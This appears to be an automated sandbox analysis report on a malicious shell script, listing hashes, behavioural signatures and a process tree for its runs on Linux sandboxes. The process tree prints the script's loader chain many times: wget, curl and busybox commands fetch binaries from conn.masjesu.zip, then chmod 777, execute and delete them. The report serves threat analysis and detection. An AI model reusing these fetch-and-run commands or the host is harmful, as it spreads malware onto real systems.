Analysis
- max time kernel: 83s
- max time network: 85s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 15/10/2024, 01:27

Static task
- static1

Behavioral tasks
- behavioral1: sample 50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample 50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh, resource debian9-armhf-20240418-en
- behavioral3: sample 50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample 50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh, resource debian9-mipsel-20240611-en
General
- Target: 50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
- Size: 10KB
- MD5: ec466edc6c1e9e990a5ec3a4f5dc57ec
- SHA1: 163a1c64d09a52b82963878c6f77cc74cfdabd10
- SHA256: 50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a
- SHA512: c4d304bb42e3c786e9d2eaf7eeb196d6756ce4aa6266bbc6af0ab152926100a5b86a3ca1d8e38cd7c77455be88fb5d2ab952ffd289c0a2a89c8b3c17c90fca88
- SSDEEP: 96:YLn4L5RnO+Fi69dHdbde7zJUNNTA55RAYL8AyLGCGaG0LXiddhkaS7LokkLEIbxM:LWc2GCNV0LXQoMvXNV0LXWnCx
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 28 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid  Process
  870  chmod
  809  chmod
  834  chmod
  884  chmod
  926  chmod
  975  chmod
  736  chmod
  863  chmod
  802  chmod
  1003 chmod
  989  chmod
  891  chmod
  919  chmod
  940  chmod
  968  chmod
  898  chmod
  905  chmod
  933  chmod
  982  chmod
  954  chmod
  961  chmod
  856  chmod
  877  chmod
  912  chmod
  947  chmod
  996  chmod
  751  chmod
  782  chmod
- Executes dropped EXE (28 IoCs)
  ioc                                         pid   Process
  /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq     737   MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls     752   59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB     784   4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh     803   wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5     810   eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi     836   B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA     857   GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA     864   OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1     871   g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7     878   zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ     885   28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi     892   TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76     899   RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi     906   zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA     913   GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA     920   OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1     927   g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7     934   zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ     941   28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi     948   TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76     955   RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi     962   zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq     969   MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls     976   59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB     983   4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh     990   wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5     997   eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi     1004  B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  description               ioc                             Process
  File opened for reading   /proc/sys/crypto/fips_enabled   curl   (28 identical entries)
- System Network Configuration Discovery (1 TTPs, 64 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid  Process
  981  busybox
  831  busybox
  887  wget
  918  busybox
  894  wget
  943  wget
  964  wget
  965  curl
  979  curl
  852  busybox
  873  wget
  922  wget
  972  curl
  740  curl
  929  wget
  932  busybox
  805  wget
  825  curl
  967  busybox
  901  wget
  971  wget
  978  wget
  735  busybox
  777  busybox
  881  curl
  936  wget
  960  busybox
  986  curl
  708  wget
  841  wget
  846  curl
  806  curl
  808  busybox
  1002 busybox
  883  busybox
  890  busybox
  930  curl
  951  curl
  985  wget
  756  wget
  869  busybox
  880  wget
  1000 curl
  876  busybox
  902  curl
  946  busybox
  764  curl
  790  wget
  862  busybox
  939  busybox
  953  busybox
  958  curl
  974  busybox
  988  busybox
  888  curl
  904  busybox
  909  curl
  999  wget
  739  wget
  866  wget
  908  wget
  944  curl
  995  busybox
  799  curl
- Writes file to tmp directory (28 IoCs)
  Malware often drops required files in the /tmp directory.
  description                    ioc                                         Process
  File opened for modification   /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls     curl
  File opened for modification   /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi     curl
  File opened for modification   /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7     curl
  File opened for modification   /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5     curl
  File opened for modification   /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1     curl
  File opened for modification   /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ     curl
  File opened for modification   /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB     curl
  File opened for modification   /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq     curl
  File opened for modification   /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls     curl
  File opened for modification   /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76     curl
  File opened for modification   /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA     curl
  File opened for modification   /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7     curl
  File opened for modification   /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi     curl
  File opened for modification   /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA     curl
  File opened for modification   /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1     curl
  File opened for modification   /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi     curl
  File opened for modification   /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh     curl
  File opened for modification   /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5     curl
  File opened for modification   /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB     curl
  File opened for modification   /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi     curl
  File opened for modification   /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi     curl
  File opened for modification   /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76     curl
  File opened for modification   /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA     curl
  File opened for modification   /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA     curl
  File opened for modification   /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi     curl
  File opened for modification   /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh     curl
  File opened for modification   /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ     curl
  File opened for modification   /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq     curl
Processes
(child processes are indented under their parent; signatures triggered by a process are listed in brackets)
- /tmp/50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh (PID 704): /tmp/50fc8b8a410a89b6160eae13bf8012763dedf86f569c16feddbcf1c6991abf9a.sh
  - /bin/rm (PID 706): /bin/rm bins.sh
  - /usr/bin/wget (PID 708): wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [System Network Configuration Discovery]
  - /usr/bin/curl (PID 728): curl -O http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 735): /bin/busybox wget http://conn.masjesu.zip/bins/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [System Network Configuration Discovery]
  - /bin/chmod (PID 736): chmod 777 MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [File and Directory Permissions Modification]
  - /tmp/MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq (PID 737): ./MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq [Executes dropped EXE]
  - /bin/rm (PID 738): rm MEy5AVuYLEC9aLgQLQkBhs5T0lND858dEq
  - /usr/bin/wget (PID 739): wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [System Network Configuration Discovery]
  - /usr/bin/curl (PID 740): curl -O http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 745): /bin/busybox wget http://conn.masjesu.zip/bins/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  - /bin/chmod (PID 751): chmod 777 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [File and Directory Permissions Modification]
  - /tmp/59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls (PID 752): ./59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls [Executes dropped EXE]
  - /bin/rm (PID 755): rm 59ZADWVvCXWQ3PcXKIemMZOtGwe2vJFKls
  - /usr/bin/wget (PID 756): wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [System Network Configuration Discovery]
  - /usr/bin/curl (PID 764): curl -O http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 777): /bin/busybox wget http://conn.masjesu.zip/bins/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [System Network Configuration Discovery]
  - /bin/chmod (PID 782): chmod 777 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [File and Directory Permissions Modification]
  - /tmp/4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB (PID 784): ./4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB [Executes dropped EXE]
  - /bin/rm (PID 788): rm 4Oi6tgR1Ku2j1mhgM8cbH0nEVGHKqSZfsB
  - /usr/bin/wget (PID 790): wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [System Network Configuration Discovery]
  - /usr/bin/curl (PID 799): curl -O http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 801): /bin/busybox wget http://conn.masjesu.zip/bins/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  - /bin/chmod (PID 802): chmod 777 wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [File and Directory Permissions Modification]
  - /tmp/wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh (PID 803): ./wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh [Executes dropped EXE]
  - /bin/rm (PID 804): rm wklIfFfeJQWgP1QwI0StIdOIqRmrYylAmh
  - /usr/bin/wget (PID 805): wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 806): curl -O http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 808): /bin/busybox wget http://conn.masjesu.zip/bins/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [System Network Configuration Discovery]
  - /bin/chmod (PID 809): chmod 777 eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [File and Directory Permissions Modification]
  - /tmp/eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 (PID 810): ./eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5 [Executes dropped EXE]
  - /bin/rm (PID 813): rm eZda7fFJZSYphLM2m311BXmM8H6QEsXcA5
  - /usr/bin/wget (PID 814): wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  - /usr/bin/curl (PID 825): curl -O http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 831): /bin/busybox wget http://conn.masjesu.zip/bins/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [System Network Configuration Discovery]
  - /bin/chmod (PID 834): chmod 777 B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [File and Directory Permissions Modification]
  - /tmp/B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi (PID 836): ./B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi [Executes dropped EXE]
  - /bin/rm (PID 839): rm B6zQpUJh1njaprdzrJp6kdZ9Ysc5Ql16Oi
  - /usr/bin/wget (PID 841): wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [System Network Configuration Discovery]
  - /usr/bin/curl (PID 846): curl -O http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 852): /bin/busybox wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [System Network Configuration Discovery]
  - /bin/chmod (PID 856): chmod 777 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [File and Directory Permissions Modification]
  - /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA (PID 857): ./GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [Executes dropped EXE]
  - /bin/rm (PID 858): rm GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  - /usr/bin/wget (PID 859): wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  - /usr/bin/curl (PID 860): curl -O http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 862): /bin/busybox wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA [System Network Configuration Discovery]
  - /bin/chmod (PID 863): chmod 777 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA [File and Directory Permissions Modification]
  - /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA (PID 864): ./OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA [Executes dropped EXE]
  - /bin/rm (PID 865): rm OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  - /usr/bin/wget (PID 866): wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 867): curl -O http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 869): /bin/busybox wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [System Network Configuration Discovery]
  - /bin/chmod (PID 870): chmod 777 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [File and Directory Permissions Modification]
  - /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 (PID 871): ./g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [Executes dropped EXE]
  - /bin/rm (PID 872): rm g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  - /usr/bin/wget (PID 873): wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 874): curl -O http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 876): /bin/busybox wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [System Network Configuration Discovery]
  - /bin/chmod (PID 877): chmod 777 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [File and Directory Permissions Modification]
  - /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 (PID 878): ./zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [Executes dropped EXE]
  - /bin/rm (PID 879): rm zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  - /usr/bin/wget (PID 880): wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [System Network Configuration Discovery]
  - /usr/bin/curl (PID 881): curl -O http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 883): /bin/busybox wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [System Network Configuration Discovery]
  - /bin/chmod (PID 884): chmod 777 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [File and Directory Permissions Modification]
  - /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ (PID 885): ./28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [Executes dropped EXE]
  - /bin/rm (PID 886): rm 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  - /usr/bin/wget (PID 887): wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [System Network Configuration Discovery]
  - /usr/bin/curl (PID 888): curl -O http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 890): /bin/busybox wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [System Network Configuration Discovery]
  - /bin/chmod (PID 891): chmod 777 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [File and Directory Permissions Modification]
  - /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi (PID 892): ./TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [Executes dropped EXE]
  - /bin/rm (PID 893): rm TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  - /usr/bin/wget (PID 894): wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 895): curl -O http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 897): /bin/busybox wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  - /bin/chmod (PID 898): chmod 777 RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 [File and Directory Permissions Modification]
  - /tmp/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 (PID 899): ./RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76 [Executes dropped EXE]
  - /bin/rm (PID 900): rm RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
  - /usr/bin/wget (PID 901): wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [System Network Configuration Discovery]
  - /usr/bin/curl (PID 902): curl -O http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 904): /bin/busybox wget http://conn.masjesu.zip/bins/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [System Network Configuration Discovery]
  - /bin/chmod (PID 905): chmod 777 zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [File and Directory Permissions Modification]
  - /tmp/zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi (PID 906): ./zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi [Executes dropped EXE]
  - /bin/rm (PID 907): rm zQuqy0zvWCgS0ToT6ee8quHD0H8SetpUpi
  - /usr/bin/wget (PID 908): wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [System Network Configuration Discovery]
  - /usr/bin/curl (PID 909): curl -O http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 911): /bin/busybox wget http://conn.masjesu.zip/bins/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  - /bin/chmod (PID 912): chmod 777 GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [File and Directory Permissions Modification]
  - /tmp/GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA (PID 913): ./GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA [Executes dropped EXE]
  - /bin/rm (PID 914): rm GH1NQYhhWOolekBjsAvuJQXfoi1N5giuoA
  - /usr/bin/wget (PID 915): wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  - /usr/bin/curl (PID 916): curl -O http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 918): /bin/busybox wget http://conn.masjesu.zip/bins/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA [System Network Configuration Discovery]
  - /bin/chmod (PID 919): chmod 777 OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA [File and Directory Permissions Modification]
  - /tmp/OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA (PID 920): ./OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA [Executes dropped EXE]
  - /bin/rm (PID 921): rm OoOxKPuwql7TH9Tbk2wt4AIUbKgMhNl9zA
  - /usr/bin/wget (PID 922): wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 923): curl -O http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 925): /bin/busybox wget http://conn.masjesu.zip/bins/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  - /bin/chmod (PID 926): chmod 777 g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [File and Directory Permissions Modification]
  - /tmp/g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 (PID 927): ./g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1 [Executes dropped EXE]
  - /bin/rm (PID 928): rm g7LwYyjVyNooHciqZm1CEDUsIFl4CEr4y1
  - /usr/bin/wget (PID 929): wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [System Network Configuration Discovery]
  - /usr/bin/curl (PID 930): curl -O http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 932): /bin/busybox wget http://conn.masjesu.zip/bins/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [System Network Configuration Discovery]
  - /bin/chmod (PID 933): chmod 777 zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [File and Directory Permissions Modification]
  - /tmp/zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 (PID 934): ./zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7 [Executes dropped EXE]
  - /bin/rm (PID 935): rm zrHoCqEfAxC9nKdAeRjnMwxGYj7gcwnQB7
  - /usr/bin/wget (PID 936): wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [System Network Configuration Discovery]
  - /usr/bin/curl (PID 937): curl -O http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 939): /bin/busybox wget http://conn.masjesu.zip/bins/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [System Network Configuration Discovery]
  - /bin/chmod (PID 940): chmod 777 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [File and Directory Permissions Modification]
  - /tmp/28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ (PID 941): ./28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ [Executes dropped EXE]
  - /bin/rm (PID 942): rm 28TJek0DTzjoO0ijbwgYjEqoQizV8ai4VZ
  - /usr/bin/wget (PID 943): wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [System Network Configuration Discovery]
  - /usr/bin/curl (PID 944): curl -O http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  - /bin/busybox (PID 946): /bin/busybox wget http://conn.masjesu.zip/bins/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [System Network Configuration Discovery]
  - /bin/chmod (PID 947): chmod 777 TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [File and Directory Permissions Modification]
  - /tmp/TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi (PID 948): ./TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi [Executes dropped EXE]
  - /bin/rm (PID 949): rm TJCvvxWaKdqSO81ZMIlEL5VoUmSa9mi9Gi
  - /usr/bin/wget (PID 950): wget http://conn.masjesu.zip/bins/RKjt4xYSEtUfCU8akU9aO4ZUMDExCuKa76
